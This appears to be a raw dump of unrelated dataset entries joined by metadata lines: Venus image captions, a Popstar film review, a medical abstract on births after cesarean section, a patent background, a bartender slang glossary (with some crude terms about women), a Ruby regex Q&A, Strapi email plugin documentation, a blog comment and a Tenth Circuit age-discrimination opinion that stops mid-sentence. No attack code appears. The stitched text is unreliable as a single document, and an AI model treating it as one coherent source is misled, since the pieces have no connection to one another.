3D image of Latona Coron (left), a circular feature appox. 1000km in diameter with a smooth, raised rim. Dali Chasma can also be seen as deep troughs in the surface
A sinuous channel on Venus likely to be carved from lava flow
3D image of Maat Mons with visible lava flow in the foreground. These lava flows extend for hundreds of kilometres
3D image of Sapas Mons that lies on the western edge of Atla Regio. Sapas Mons can be seen in the centre of the image
|
{
"pile_set_name": "Pile-CC"
}
|
“Ever since I was born, I was dope.”
This is our introduction to Andy Samberg’s Conner4Real, and it offers just the sort of genial hubris that marks Conner’s blessed life. He was whaling on the drums as a toddler; he met his two best friends (Akiva Schaffer and Jorma Taccone as Lawrence and Owen) young in life, and together these three kids founded the instantly successful rap trio The Style Boyz. After an ego fall-out with Lawrence, Conner’s spun off into his solo act, and his first album sold millions.
But in the grand tradition of easy success stories, Conner has now surrounded himself with yes men and parasites. He tried something new with his second album, refusing to use any of Owen’s beats and writing all of the dipshit lyrics himself, and the results are dismal. The album fails, starting a chain reaction of failures, everything from Conner's relationships to his stage illusions. Conner’s had a prideful life, and now he’s about to suffer a big fall.
Popstar: Never Stop Never Stopping is a Lonely Island movie through and through. Schaffer and Taccone directed the film, from a script by all three members, and it feels like an ideal culmination of everything that makes a Lonely Island sketch work. Rarely does a Saturday Night Live concept translate so effectively into a feature film, but Popstar accomplishes that transformation with a good nature, coherent script and nimble, non-stop jokes. Just joke after joke after joke, at a success rate much higher than even the best episodes of SNL. There’s plenty of stupidity here, but just the right amount, and none of it goes on too long. Before you’ve wrapped your head around one silly gag, Popstar has donkey rolled its way onto the next one.
Is the fate of The Style Boyz that of Lonely Island? It’s easy to make a comparison between the two trios. Samberg, Taccone and Schaffer became friends in junior high and rose to fame with seeming ease before being hired by Lorne Michaels to SNL, where Samberg became the breakout star, the featured player with by far the most surface success. Whether ego or envy were ever a part of Lonely Island’s story, they make The Style Boyz’s fictional history feel likely and authentic. It’s a small story, and it’s a dumb story, but it’s also a resonant one, and an efficient one. At under ninety minutes, Popstar hits every required narrative beat, giving us change, desire, conflict, resolution and triumph in clear, tidy doses.
And not for nothing, this movie looks like a movie. Cinematographer Brandon Trost has gotten a lot of well-earned attention lately for the way he shoots comedies, and Popstar is a perfect example. It’s bright and kinetic, just fun to look at. Conner’s tour performances and music videos are a blast, and since this is a Lonely Island joint, it should surprise nobody that the songs are, to a one, genius. With guest performances by Adam Levine, P!nk, Emma Stone, Seal, Akon and more, you’ll have no problem both cracking up and singing along to these jams. The titles include “I’m So Humble,” “Karate Guy,” “Things in My Jeep” and “Equal Rights,” in which Conner trips over himself to assure fans that he’s “not gay!” in a song about legalizing gay marriage…released months after gay marriage was made legal.
In addition to all of the musical guests, Popstar succeeds where so many other farces fail: a wealth of cameos that don’t feel shoehorned in or superfluous. After all, Popstar is a mockumentary about the rise and fall of a musician, so celebrity talking heads like Questlove, Carrie Underwood, Nas, Usher, Mariah Carey, Simon Cowell and Ringo Freaking Starr all have a place in this format.
The more substantial performances are even more successful: Tim Meadows and Sarah Silverman both stand out as Conner’s beleaguered management team, Justin Timberlake is his gentle, wide-eyed chef, and Joan Cusack absolutely kills as Conner’s flighty mother, a loving matriarch who is nevertheless enjoying the party scene a little too much.
Popstar does a terrific job of satirizing stardom, and the pop music industry as a whole, and you can’t skewer the dumb world of celebrity without skewering the dumbest part of it all. That brings us to Will Arnett, Chelsea Peretti, Mike Birbiglia and Eric André, having the most fun of anyone here by mocking the gleefully unhinged staff of a TMZ stand-in called CMZ. These guys are idiots. Evil idiots.
In other words, everyone’s great here. But this is the story of The Style Boyz, and Samberg, Taccone and Schaffer share a lovely chemistry, the kind of chemistry born from real history, the kind that can’t be faked. Despite a brief but delightful love interest role by Imogen Poots, Popstar has no real romance to speak of – except the romance among Conner, Owen and Lawrence. They may have let success get in the way of their friendship, but the most moving testimonials from admiring celebrity fans are all about the magic that happened when The Style Boyz were making music together. It’s easy to roll our eyes at Conner4Real, but the friendship at the core of his film is the realest thing about it.
|
{
"pile_set_name": "OpenWebText2"
}
|
The course of subsequent pregnancies after previous cesarean section.
The course of pregnancies subsequent to cesarean section (CS) was studied. During the years 1970-72, 543 women were delivered by CS at Borås Central Hospital. A questionnaire was sent to all 543 during the autumn of 1976 and the spring of 1977. The questions concerned further conceptions and the outcome of all subsequent pregnancies after CS. Of the 440 (81%) women who answered the questionnaire, 244 (55.5%) became pregnant, the total number of subsequent pregnancies being 306. The incidence of spontaneous abortion, extra-uterine pregnancy and legal abortion was not significantly higher than the corresponding rate for the total material for our department during the same period. Among the 215 women who completed a new pregnancy, an elective CS was performed in 81 cases (38%). Trial of labor occurred in 143 patients, 91 of whom (68%) gave birth per vaginam , while 43 (32%) were delivered by acute CS. In nearly half of the acute CS cases the indication was a narrow pelvis not detected until labor had started. This indicates that roentgenologic pelvimetry should be considered in certain cases, when planning delivery after a previous CS.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
This section introduces aspects that may be helpful to facilitating a better understanding of the inventions. Accordingly, the statements of this section are to be read in this light and are not to be understood as admissions about what is in the prior art or what is not in the prior art.
MulteFire™ Alliance (MFA) is an organization dedicated to developing a Long Term Evolution (LTE) based communication technology for small cells operating exclusively in unlicensed spectrum, e.g., the global 5 Gigahertz (GHz) unlicensed band known as the Unlicensed National Information Infrastructure (U-NII) radio band.
MFA defines a Neutral Host Network (NHN) access mode. The NHN access mode is provided to mobile devices (mobiles) based on authorization from the mobile subscriber's preferred Participating Service Provider (PSP) that may or may not be a 3rd Generation Partnership Project (3GPP) type Mobile Network Operator. As a consequence, the mobile subscriber may or may not be provisioned with identity typical for the 3GPP subscriptions, e.g., the International Mobile Subscriber Identity (IMSI), in a licensed radio band network such as a 3GPP Evolved Packet Core (EPC) network. The IMSI is used to identify the user (mobile subscriber device) of a cellular network and is a unique identification associated with all cellular networks.
|
{
"pile_set_name": "USPTO Backgrounds"
}
|
In addition to knowing you way around a bottle of Fernet, these are the essential terms you need to study if you want to survive behind the stick.
Whether we’re lawyers or lifeguards, doctors or ditch diggers, crooks or cooks, we all use slang in our lives. It’s not surprising that bartenders have their own unique lingo as well. Sit at a bar sometime and, for once, don’t watch the relentless Sportscenter highlights or dick around on your iPhone—actually listen to the casual conversation being bandied about by the bartenders when they think no customers are listening.
You might not understand some of the jargon, and you’re certainly not going to find most terms in the dictionary (or Urban Dictionary for that matter), but, believe me, these seemingly nonsensical words mean things—things both crucial and completely inane.
Thanks to Kyle Kensrue, beverage director at Randolph Beer and host of the upcoming ABV: A Beer Voyage; Nico Szymanski, head bartender at Irvington; Steve Schneider, bar manager and principal bartender at Employees Only; Brent Lamberti, formerly of The Corner Bistro, now national brand ambassador for elit by Stolichnaya; John McCarthy, cocktail director at Cedar Local; and many others who wished to remain anonymous* but who opened their kimonos (or, at least, their bar aprons) to reveal some lingo they unleash every single night.
Each bar will have its own unique patois, but many terms are widespread in the industry. Here’s a guide to common bar jargon.
Abrams
“A while back some buddies and I started calling good looking girls ‘Abrams,’” Kensrue explains. “As in Abrams Targeting in the Navy. One of our bartenders was an old Navy guy. When a cute girl would walk by we would call out to each other ‘Abrams!’ as in: target acquired.”
B.A.
A barrel-aged beer. (Could also be used, either fondly or disparagingly, to refer to a customer who is also a poster on the BeerAdvocate.com message boards.)
Baby
A small shot, often of beer, taken quickly.
Bartender’s handshake
Usually a small shot of Fernet-Branca given to a fellow bartender drinking at your bar (usually for free).
Behind the stick
Working at the bar that night.
Beverage program
Unnecessarily pretentious way of describing the beers, wines, liquors, cocktails, and other libations as bar has on its menu. Top bars are said to have a good “program.”
Boomerang
A drink sent from one bartender to another bartender at another bar, usually by a trustworthy customer.
Build
To make a drink, usually a cocktail which necessitates adding many ingredients in a particular order, (i.e., “building” a Queens Park Swizzle).
Burning
“Burning the ice” means hitting the well with hot water at the end of the night—or, after accidentally breaking glass into it—in order to melt it quickly.
Cheaters
Often unlabeled bottles, kept in the bar’s speed well or atop the bar, of bitter, syrups, and liqueurs—sometimes housemade—that a bartender plans to use frequently during service and, thus, needs to have close at hand.
Cicinho
A female customer with large breasts, named after a famous Brazilian soccer player.
Dancing
Moving behind the bar with other bartenders and barbacks to avoid tripping over one another.
Drain pour
A terrible beer—one so bad, it is isn’t even worth finishing for mere intoxication purposes. There is no choice but to immediately pour the remainder of the beer down the drain. Beer geeks often take a perverse pride in the beers they actually consider “drain pours.”
Dusties
In the retail world, refers to good bottles of booze that for some reason were never purchased, thus ending up with dust caked on them. Behind the bar, could refer to certain oddball liqueurs that no customers ever order and no cocktails ever necessitates. [Compare to “turds.”]
Hazmat
A whiskey that is barrel-proof and extremely alcoholic. While hot on the palate, it may still be quite tasty (George T. Stagg, for instance). Most accurately refers to bourbons over 140-proof—the threshold for liquors one is legally allowed to bring onto airplanes.
’Loons
Lambics and gueuzes from Brasserie Cantillon in Brussels, Belgium. Highly-coveted by beer geeks and now somewhat rare in America.
The Point
The end of the bar nearest the door. This is where the best bartender should work.
Service Bartender
The bartender that takes care of the drinks for the floor, as opposed to people sitting at the bar. Usually not as friendly as the other bartenders.
Service Bar
Where the waitstaff gets drinks ordered by people sitting at tables. Usually guests are discouraged from congregating around or ordering from the service bar.
Spec
Essentially a cocktail recipe. “For example, if I can’t remember the recipe for a cocktail I might call out to another bartender, ‘What’s the spec on the X cocktail?’” McCarthy says. “And they might respond, ‘Two, one, half, quarter, quarter, Ango’ and I’d now know exactly how to make the drink.”
Sours
A catchall term for any of the numerous styles of beer than can taste sour. This could include lambics, gueuzes, American wild ales, Flanders red ales, goses, and Berliner weisses.
Staff Meeting
An impromptu round of shots taken by the staff during a shift.
Three-Deep
A packed bar. Three-deep means that there are about three rows of people at the bar. “We are three-deep every night,” claims Schneider.
Ticker
A beer geek who cares more about quantity than quality. He would rather “tick” off many new beers quickly than savor a pint of one beer he’s already had before. Big fans of flights and samplers, tickers often think a mere ounce of beer is enough to truly “get” the beer, and, thus, log a nasty rating of it into Untappd.
Till
The cash register.
Tinder Date
An obviously awkward twosome who just met (and, sometimes, really are on a Tinder date). Szymanski explains they are “typically spotted once you hear awkward boasting of wealth, awkward glances at the guest’s phone or watch, awkward half-hug goodbyes, and yes, even awkward making out.”
Turds
Or “shelf turds.” Similar to dusties, beers that sit on shelves unpurchased for a long amount of time, thus “turding it up.” These turds could be great beers that simply are produced in a massive amount, rendering them less “sexy,” or beers that aren’t very good, and which no respectable beer geek will ever purchase.
Trolls
Kensrue explains, “This is for the guys that walk in looking for the freshest IPA with an IBU count of 1,000, wearing plaid and a massive, burly beard. The obnoxious beer nerd who thinks he knows more than everyone in the place combined. We actually have a sign in the back that says ‘No Trolls.’”
Whalez
Highly-coveted beers (i.e., “’Loons”) that beer geeks hunt with the same gusto that Ahab searched for Moby Dick. Often used jokingly or ironically. Beer geeks take pride in noting what they consider a whale and what they don’t—“Really? You consider Side Project Fuzzy a whale? Hmmm…”
*As one bartender wrote back to me, “(I) don’t feel comfortable giving up details for what is essentially a form of communication which would compromise any code of conduct and/or act of discretion that (we) use at work in accordance with guests.” I don’t really know what that means…but he didn’t participate.
Aaron Goldfarb (@aarongoldfarb) is the author of How to Fail: The Self-Hurt Guide, The Guide for a Single Man, and The Guide for a Single Woman.
RELATED: Kitchen Slang 101: How to Talk Like a Real-Life Line Cook
|
{
"pile_set_name": "OpenWebText2"
}
|
Q:
Ruby on a Mac -- Regular Expression Spanning Two Lines of Text
On the PC, the following Ruby regular expression matches data. However, when run on the Mac against the same input text file, no matches occur. Am I matching line returns in a way that should work cross-platform?
data = nil
File.open(ARGV[0], "r") do |file|
data = file.readlines.join("").scan(/^Name: (.*?)[\r\n]+Email: (.*?)$/)
end
Versions
PC: ruby 1.9.2p135
Mac: ruby 1.8.6
Thank you,
Ben
A:
The problem was the ^ and $ pattern characters! Ruby doesn't consider \r (a.k.a. ^M) a line boundary. If I modified my pattern, replacing both ^ and $ with "\r", the pattern matched as desired.
data = file.readlines.join.scan(/\rName: (.*?)\rEmail: (.*?)\r/)
Instead of modifying the pattern, I opted to do a gsub on the text, replacing \r with \n before calling scan.
data = file.readlines.join.gsub(/\r/, "\n").scan(/^Name: (.*?)\nEmail: (.*?)$/)
Thank you each for your responses to my question.
|
{
"pile_set_name": "StackExchange"
}
|
# Email
Thanks to the plugin `Email`, you can send email from your server or externals providers such as **Sendgrid**.
## Programmatic usage
In your custom controllers or services you may want to send email.
By using the following function, strapi will use the configured provider to send an email.
```js
await strapi.plugins['email'].services.email.send({
to: 'paulbocuse@strapi.io',
from: 'joelrobuchon@strapi.io',
replyTo: 'no-reply@strapi.io',
subject: 'Use strapi email provider successfully',
text: 'Hello world!',
html: 'Hello world!',
});
```
## Configure the plugin
The plugin provides you a settings page where you can define the email provider you want to use.
You will also be able to add some configuration.
- Click on **Plugins** in the left menu
- Click on the cog button on the **Email** plugin line
## Install new providers
By default Strapi provides a local email system. You might want to send email with a third party.
You can check all the available providers developed by the community on npmjs.org - [Providers list](https://www.npmjs.com/search?q=strapi-provider-email-)
To install a new provider run:
:::: tabs
::: tab yarn
```
yarn add strapi-provider-email-sendgrid@beta --save
```
:::
::: tab npm
```
npm install strapi-provider-email-sendgrid@beta --save
```
:::
::::
::: tip
If the provider is not in the mono repo, you probably don't need `@beta` depending if the creator published it with this tag or not.
:::
Then, visit [http://localhost:1337/admin/plugins/email/configurations/development](http://localhost:1337/admin/plugins/email/configurations/development) on your web browser and configure the provider.
## Create new provider
If you want to create your own, make sure the name starts with `strapi-provider-email-` (duplicating an existing one will be easier), modify the `auth` config object and customize the `send` function.
Default template
```js
module.exports = {
provider: 'provider-id',
name: 'display name',
auth: {
config_1: {
label: 'My Config 1',
type: 'text',
},
},
init: config => {
return {
send: async options => {},
};
},
};
```
In the `send` function you will have access to:
- `config` that contains configurations you setup in your admin panel
- `options` that contains options you send when you call the `send` function from the email plugin service
To use it you will have to publish it on **npm**.
### Create a local provider
If you want to create your own provider without publishing it on **npm** you can follow these steps:
- Create a `providers` folder in your application.
- Create your provider as explained in the documentation eg. `./providers/strapi-provider-email-[...]/...`
- Then update your `package.json` to link your `strapi-provider-email-[...]` dependency to the [local path](https://docs.npmjs.com/files/package.json#local-paths) of your new provider.
```json
{
...
"dependencies": {
...
"strapi-provider-email-[...]": "file:providers/strapi-provider-email-[...]",
...
}
}
```
- Finally, run `yarn install` or `npm install` to install your new custom provider.
## Troubleshooting
You received an `Auth.form.error.email.invalid` error even though the email is valid and exists in the database.
Here is the error response you get from the API.
```json
{
"statusCode": 400,
"error": "Bad Request",
"message": [
{
"messages": [
{
"id": "Auth.form.error.email.invalid"
}
]
}
]
}
```
This error is due to your IP connection. By default, Strapi uses the [`sendmail`](https://github.com/guileen/node-sendmail) package.
This package sends an email from the server it runs on. Depending on the network you are on, the connection to the SMTP server could fail.
Here is the `sendmail` error.
```
Error: SMTP code:550 msg:550-5.7.1 [87.88.179.13] The IP you're using to send mail is not authorized to
550-5.7.1 send email directly to our servers. Please use the SMTP relay at your
550-5.7.1 service provider instead. Learn more at
550 5.7.1 https://support.google.com/mail/?p=NotAuthorizedError 30si2132728pjz.75 - gsmtp
```
To fix it, I suggest you to use another email provider that uses third party to send emails.
When using a third party provider, you avoid having to setup a mail server on your server and get extra features such as email analytics.
|
{
"pile_set_name": "Github"
}
|
Just finished reading an interview with David Hinton in the latest issue of The Sun……I didn’t realize that the poets he translates mostly came from the top 1percent of society, were relatively well-off, most often bureaucrats who retired to the rivers-and-mountains to meditate, garden, make art, take walks, and drink wine with friends….
oh yes, Cynthia! I suppose that ruffles our modern feathers. But it’s good enough as an excuse not to read them. I’m grateful Basho had no such prejudices! Not to mention Hinton! The mere acquisition of the skill set was part of the education of the political and civic life in ancient China; the metaphysics came with the training in verse. So when the winds of change blew strong, the civil servant could fall back on his estates and lead the life of a poet, and that usually meant a Taoist, turning over the pages of the Zhuangzi just as Horace turned over his Socratic pages. Don’t you just love literary history?
If you read Hinton’s introductions to the various poets you will see that very often the vicissitudes of political life did in fact place the poets in harm’s way, the retirements could be serial and brutal, poverty was often the end-game, and Taoism’s theme of poverty and emptiness came to be lived in ways none of them could foresee.
Looking’s not enough and the winter light gives with abandon. Somehow there are ways for looking to be more than looking. How? Perhaps looking as openness, as receptivity not just the stare of ‘looking’, can enable us to take part in that stark but generous giving of December pond- light?
|
{
"pile_set_name": "Pile-CC"
}
|
FILED
United States Court of Appeals
Tenth Circuit
February 9, 2012
UNITED STATES COURT OF APPEALS
Elisabeth A. Shumaker
Clerk of Court
FOR THE TENTH CIRCUIT
RONALD V. MAPP;
JOHN STURDIVANT,
Plaintiffs–Appellants, No. 10-3322
(D.C. No. 6:09-CV-01304-EFM)
v. (D. Kan.)
DUCKWALL-ALCO STORES, INC.,
Defendant–Appellee.
ORDER AND JUDGMENT *
Before LUCERO, BALDOCK, and TYMKOVICH, Circuit Judges.
Appellants Ronald Mapp and John Sturdivant, former employees of
Appellee Duckwall-Alco Stores, Inc. (“Duckwall”), appeal the district court’s
grant of summary judgment dismissing their Age Discrimination in Employment
Act (“ADEA”) and breach of contract claims. We have jurisdiction under
28 U.S.C. § 1291 and affirm.
*
After examining the briefs and appellate record, this panel has determined
unanimously to grant the parties’ request for a decision on the briefs without oral
argument. See Fed. R. App. P. 34(f); 10th Cir. R. 34.1(G). The case is therefore
ordered submitted without oral argument. This order and judgment is not binding
precedent, except under the doctrines of law of the case, res judicata, and
collateral estoppel. It may be cited, however, for its persuasive value consistent
with Fed. R. App. P. 32.1 and 10th Cir. R. 32.1.
I
Duckwall is a Kansas corporation that operates regional retail stores in
numerous states. In March 2005, Duckwall hired Bruce Dale, who was employed
at the time by Michael’s Stores, as its new President and Chief Executive Officer
(“CEO”). In the beginning of 2006, Duckwall hired Sturdivant as its Senior Vice
President of Operations. Sturdivant was sixty-one years old at the time. In July
of 2007, Duckwall hired Mapp to be its Senior Vice President of Merchandising.
Mapp was fifty-nine years old at the time. Both Sturdivant and Mapp had
previously worked with Dale at Michael’s Stores and were recruited by Dale to
come to Duckwall. Dale resigned from his position at Duckwall on February 22,
2008, and Donny Johnson, who was a Senior Vice President and the Chief
Financial Officer of Duckwall, was promoted to interim President and CEO.
On March 1, 2008, Johnson had a conference call with Duckwall’s Board of
Directors during which the Board stressed that the company needed to be
reorganized to streamline costs and minimize overhead. That same day, Johnson
sent an e-mail to the Senior Vice Presidents with the subject line “Overhead
Efficiencies,” informing them of the conference call and notifying them that the
Board had stressed the need to move quickly on “implementing accountability.”
The Board suggested a thirty-day comment period in which to restructure the
company. Johnson therefore requested in his e-mail that, “after we get through
Tuesday,” he wanted each of the Senior Vice Presidents to develop a plan to
-2-
implement savings. He informed them that he would schedule meetings with each
of them over the next few weeks so that he could have an overall cost-reduction
strategy outlined prior to the April Board meeting. The “Tuesday” that Johnson’s
e-mail referred to was March 4, 2008. On that day, a budget and planning
meeting was held with the Board at which Johnson was present along with several
corporate officers, including Mapp and Sturdivant. Mapp, Sturdivant, and others
made presentations to the Board regarding what they thought should “be done to
move the company forward.”
On March 5, Royce Winsten, a member of the Board, e-mailed Johnson.
Winsten expressed his opinion that serious cuts needed to be made to overhead
expenses and directed Johnson to:
Pull together your competent SVP/VPs and build from there. From
the look of things yesterday it will be a small group. It’s clear Mapp,
St[u]rdivant and [Virginia Meyer] are very weak players in very
important slots. Their direct reports are likely as weak as they are.
As I thought about Hixon, he seemed relatively strong in the group
but the bar was set very low. In any event, it would seem there will
be no need for a real estate guy.
Three days later, Johnson informed Winsten by e-mail that he was “making good
progress [on his] proposed re-organized corporate support staff.” He attached the
current organization chart, showing eighteen officer positions, and a proposed
reorganized chart with twelve officer positions. 1 In a later e-mail to Winsten on
1
These were not the only proposed cuts. For example, Johnson suggested in
(continued...)
-3-
March 10, Johnson identified eight officer positions that he thought could be
reduced to three. Finally, in an e-mail dated March 21, 2008, Johnson proposed
replacing the current eighteen officer positions with eleven officer positions.
These proposals all anticipated the termination of the employment of Sturdivant,
Mapp, and Meyer. On March 31 and April 1, 2008, the company Vice Presidents
and Senior Vice Presidents were scheduled to meet with Jim Hyde, a member of
the Board of Directors, as part of the process of evaluating their qualifications.
Some were scheduled to meet for thirty minutes and some for forty-five.
Sturdivant, Mapp, and Meyer were to meet on April 1, 2008. On that day, they
were told that their meeting times were to be rescheduled and that they were
going to be meeting later in the day and for only fifteen minutes.
On April 11, 2008, Duckwall terminated the employment of Sturdivant and
Mapp, who were the two oldest Senior Vice Presidents at sixty-three and sixty
years old respectively. Vice Presidents Meyer and Mike Gawin, who were
sixty-four and fifty-six years old respectively, also had their employment
terminated. Johnson informed Sturdivant and Mapp on that day that their
employment was being terminated as a cost-cutting measure and had nothing to
do with their performance. Sturdivant and Mapp were two of the top four highest
1
(...continued)
the e-mail that 42 of the 216 total corporate positions be eliminated, and that
approximately 72 of the 261 existing stores be closed.
-4-
paid employees at Duckwall. In May 2008, Duckwall eliminated another twenty
corporate positions.
In January 2009, Sturdivant and Mapp each filed discrimination charges
with the Equal Employment Opportunity Commission (“EEOC”). In Duckwall’s
responses to the agency, it asserted that appellants’ employment was terminated
as a result of “a substantial corporate reorganization of numerous departments”
following Dale’s resignation. Appellants’ “close personal and professional ties
and/or loyalty” to Dale were also cited.
Before the district court, the parties agreed that McDonnell Douglas Corp.
v. Green, 411 U.S. 792, 802-04 (1973), is applicable and that, under that analysis:
the plaintiff must initially establish a prima facie case of
discrimination. If the plaintiff establishes a prima facie case, the
burden shifts to the employer to articulate some legitimate,
nondiscriminatory reason for its action. Should the defendant carry
this burden, the plaintiff must then have an opportunity to prove by a
preponderance of the evidence that the legitimate reasons offered by
the defendant were not its true reasons, but were a pretext for
discrimination.
Simmons v. Sykes Enters., Inc., 647 F.3d 943, 947 (10th Cir. 2011) (citations
omitted). Applying this standard, the district court held that appellants had met
their burden of establishing a prima facie case of discrimination and that
Duckwall had met its burden of presenting legitimate, non-discriminatory reasons
for the terminations. The court, however, found that appellants failed to present
-5-
sufficient evidence to demonstrate that Duckwall’s proffered reasons for the
terminations were a pretext for age-related discrimination.
Addressing appellants’ breach of contract claim, the court held that
appellants were not entitled to reimbursement under the terms of the contract at
issue.
II
“We review the grant of summary judgment de novo, applying the same
standards as the district court. We view the facts, and all reasonable inferences
those facts support, in the light most favorable to the nonmoving party . . . .”
Simmons, 647 F.3d at 947 (citation omitted). “The court shall grant summary
judgment if the movant shows that there is no genuine dispute as to any material
fact and the movant is entitled to judgment as a matter of law.” Fed. R. Civ. P.
56(a).
A
Appellants argue that the district court erred in granting summary judgment
in favor of Duckwall on their age discrimination claims because they presented
sufficient evidence to demonstrate pretext or an inference of discrimination on the
basis of their age.
A plaintiff generally demonstrates pretext by “producing evidence of such
weaknesses, implausibilities, inconsistencies, incoherencies, or contradictions in
the employer’s proffered legitimate reasons for its action that a reasonable
-6-
factfinder could rationally find them unworthy of credence.” Sanders v. Sw. Bell
Tel., L.P., 544 F.3d 1101, 1106 (10th Cir. 2008) (quotation omitted). “A plaintiff
who demonstrates pretext gets over the hurdle of summary judgment.” Id. at 1105
(quotation omitted).
1
Appellants contend that pretext is shown by Duckwall’s failure to follow its
own reduction in force procedures. Specifically, they argue that Duckwall
implemented, but failed to follow, a “2-step strategy for evaluating and
reorganizing its structure.” We agree that if Duckwall had set forth specific
criteria or standards for determining which employees to lay off, and then
violated those criteria or applied them inconsistently in terminating appellants’
employment, such action might be considered evidence of pretext. Id. at 1106-07.
But the record simply does not show that Duckwall established an official
corporate reorganization procedure from which it deviated.
According to the appellants, the first “step” in this alleged reorganization
procedure was Johnson’s March 1, 2008, direction to the Senior Vice Presidents
to develop reorganization plans within thirty days. Appellants claim that their
presentations to the Board on March 4, 2008, were the reorganization plans
Johnson had requested three days before. But the presentations that Mapp and
Sturdivant made to the Board were not the same presentations to which Johnson’s
e-mail referred (which were to be made to Johnson directly), nor were Mapp and
-7-
Sturdivant the only people to make presentations to the Board. As noted above,
Johnson requested in his March 1 e-mail that he wanted each of the Senior Vice
Presidents to develop a plan to implement savings, “after we get through
Tuesday.” Thus, Johnson’s e-mail did not anticipate the reorganization plans
being prepared until after the March 4 meeting.
The alleged second “step” in the reorganization procedure was a series of
one-on-one meetings on April 1, 2008, between Jim Hyde and each Senior Vice
President and several Vice Presidents for the purpose of evaluating the
qualifications of the management staff. Appellants assert that they were only
allowed to meet with Hyde for fifteen minutes, instead of being given forty-five
minutes like everyone else, and that this deviation shows that Duckwall had
planned on firing them prior to announcing the restructuring. But even if we
assume that Duckwall intended to terminate appellants’ employment prior to the
April 1 meeting, there had been no formal announcement of a two-step
reorganization procedure. Nor did Duckwall assure employees that no
reorganization decisions would be made until after that meeting. 2
2
We note that appellants make a brief argument that Johnson had not been in
his position as interim CEO long enough to properly evaluate the executives
serving under him and make a informed decision based on merit. Even assuming
this is true, it is not evidence of discrimination.
-8-
2
Appellants also contend that Duckwall’s assertion that their relationship
with the former CEO, Dale, was a factor in its decision to terminate their
employment shows pretext because it was a post hoc fabrication. They claim that
this reason was not asserted until the company’s response to the EEOC charges,
that they were never questioned about their loyalty to Dale, and that one of the
executives that moved from a Vice President to a Senior Vice President, Phillip
Hixon, actually had closer ties to Dale than either of them.
After-the-fact justifications for termination can certainly show pretext.
See, e.g., Williams v. W.D. Sports, N.M., Inc., 497 F.3d 1079, 1093 (10th Cir.
2007); Plotke v. White, 405 F.3d 1092, 1103 (10th Cir. 2005). But here,
appellants’ evidence does not contradict the legitimate justifications offered by
Duckwall. When appellants were terminated, they were not provided any specific
reasons other than the company’s cost-cutting reorganization and reduction in
workforce. The fact that appellants’ relationship to Dale may have also been a
factor in no way undermines the company’s proffered explanation at the time of
termination. Duckwall’s additional explanation thus does not help the company’s
case, but without more, it also does very little for the appellants.
3
Appellants argue that several age-related comments suggested
discrimination. However, these comments were either made by people who had
-9-
no role in the termination decisions or were not indicative of any discriminatory
intent.
The first comment was made by Tom Canfield, another Senior Vice
President. After Duckwall hired a sixty-eight-year-old woman as a district
manager in 2007, Canfield commented to Sturdivant that he could not believe
Duckwall had hired someone that age. While this comment appears to be
evidence that Canfield might have personally considered advanced age a
disqualifying factor in an employment candidate, there is nothing that shows that
Canfield had any role in appellants’ terminations. “[A]ge-related comments by
non-decisionmakers are not material in showing the . . . action was based on age
discrimination . . . .” Minshall v. McGraw Hill Broad. Co., Inc., 323 F.3d 1273,
1287 (10th Cir. 2003) (quotation omitted). Thus, this comment cannot be
evidence of pretext.
Appellants assert that the reference to them as “weak” in Winsten’s e-mail,
when viewed in conjunction with the comments in a memorandum about new
energy and excitement needing to be infused into the company, shows pretext.
This point is meritless because the author of the memorandum, Hixon, had no role
in the decision to terminate the appellants. Minshall, 323 F.3d at 1287.
Finally, appellants allege that a comment made by Board member James
Hyde to Mapp shows pretext. On April 1, 2008, Mapp met with Hyde for an
evaluation or review. During the meetings, Hyde said “Jeeze, you’ve been around
-10-
a long time[,]” and asked him “why aren’t you the operator[?]” Mapp testified
that he thought the comment meant that he had been employed in “retail” for
many years and that it implied that he “might seriously be considered for the
operator position in the company.” This is not evidence of pretext. This is a
comment about Mapp’s extensive retail experience and an expression of surprise
that, considering his extensive experience, Mapp was not “the operator.” There is
no suggestion that Hyde viewed advanced age as a disqualifying factor to
continued employment.
In sum, appellants presented no evidence from which a jury could properly
find that such reasons were pretextual and that their age was the actual cause of
the terminations.
B
Appellants also argue that the district court erred in holding that Duckwall
was entitled to summary judgment on their breach of contract claims. Appellants
claimed that Duckwall breached their employment agreements by failing to pay
the expenses they incurred relating to real estate commissions and closing costs
on the sales of their residences. The question at issue is whether these expenses
qualified as “Earned Obligations” under the terms of appellants’ employment
agreements.
We review questions of contract interpretation, which are questions of law,
de novo. Level 3 Commc’ns, LLC v. Liebert Corp., 535 F.3d 1146, 1154
-11-
(10th Cir. 2008). “De novo review is particularly appropriate when, as here, the
district court’s interpretation of the contract turned on an analysis of the language
and an application of the principles of contract interpretation, rather than upon the
credibility of extrinsic evidence.” Id. (quotation and ellipsis omitted).
Section 5(c)(2) of each of the appellants’ employment agreements provides
that in the event of termination without cause, for good reason, or because of the
company’s failure to extend, the appellants were to be paid “all Earned
Obligations in a lump sum within thirty (30) days after the date of Termination of
Employment[.]” The term “Earned Obligations” is defined at section 1 of the
agreement:
[A]s of the date of Termination of Employment, the sum of (A) the
Employee’s aggregate Base Salary through such date to the extent
not theretofore paid, plus (B) all vacation pay, expense
reimbursements and other cash entitlements earned by the Employee
hereunder as of such date to the extent not theretofore paid, plus (C)
the Deferred Compensation and Severance payments required
pursuant to Section 3(b) and 3(c) hereof.
One of the expense reimbursements provided for in appellants’ employment
agreements was moving expense reimbursement. The pertinent part of Section
3(c)(4) in Sturdivant’s agreement read:
Moving Expense Reimbursement. The Company will reimburse the
Employee for his actual expenses not to exceed Seventy-Five
Thousand Dollars ($75,000.00) incurred by Employee for (i) any real
estate commission paid by the Employee in the sale of his residence
in Atlanta, Georgia[.]
-12-
Similarly, the pertinent part of Section 3(c)(4) in Mapp’s agreement read:
Expense Reimbursement. The Company will reimburse the
Employee for his actual expenses not to exceed Fifty Thousand
Dollars ($50,000.00) incurred by Employee for any real estate
commission and closing costs paid by the Employee in the sale of his
residence in Phoenix, Arizona.
Appellants argue on appeal that the contract required Duckwall to pay the
commissions and closing costs on the sale of their homes even though the homes
were not sold at the time of their termination. 3 They argue that subsection (C) of
the “Earned Obligations” definition—and not subsection (B)—is the subsection
that is relevant to reimbursement for moving expenses, and that subsection does
not contain language limiting payments to those earned as of the date of
termination. Thus, as noted by the district court, appellants’ argument is that the
contract requires Duckwall to reimburse them for the closing costs and
commissions at issue no matter how long after the date of termination they
actually sell their homes.
The district court held that the contract was not ambiguous. The court
further held that, under its plain language, appellants must be paid only “expense
reimbursements” that they had earned as of the date of termination. Thus,
because the houses had not sold at the time of termination, the company was not
